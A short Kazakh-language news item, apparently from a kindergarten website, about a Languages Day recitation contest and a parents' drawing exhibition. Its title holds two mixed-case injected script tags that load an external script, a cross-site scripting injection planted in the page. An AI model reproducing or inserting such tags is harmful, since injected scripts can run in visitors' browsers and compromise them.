Қазақстан халқының тілдер күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.09.2021

Еліміздегі тілдер мерекесіне  орай  балабақшада ортаңғы, ересек және мектепалды даярлық  топтарының арасында  «Ана тілі – жүрек үні» атты мәнерлеп оқу сайысы өткізілді.    

Мақсаты: Балабақша тәрбиеленушілерін қасиетті ана тілімізге деген сүйіспеншілікті арттыру, ана тіліміздің қадір-қасиетін біліп, сөз құдіретін түсіне білуге баулу; ойлау қабілетін, тіл байлығын дамыту; тіл мәртебесін арттыруға атсалысуға тәрбиелеу.

Балалар қазақ, орыс тілінде жаттап келген тіл туралы өлеңдерін айтып, жүлделі орындарға және белсенді қатысқандары үшін мадақтау қағаздарына ие болды.

Сонымен қатар «Мемлекеттік  тіл -татулық  тірегі»  атты ата-аналармен біріккен сурет көрмесі ұйымдастырылды. Балалар тәрбиешілермен, ата-аналармен бірге салынған суреттерді көрмеге дайындады.

 

Просмотров: 428


Пікір қосу



Деректерді қолтаңбаға қосу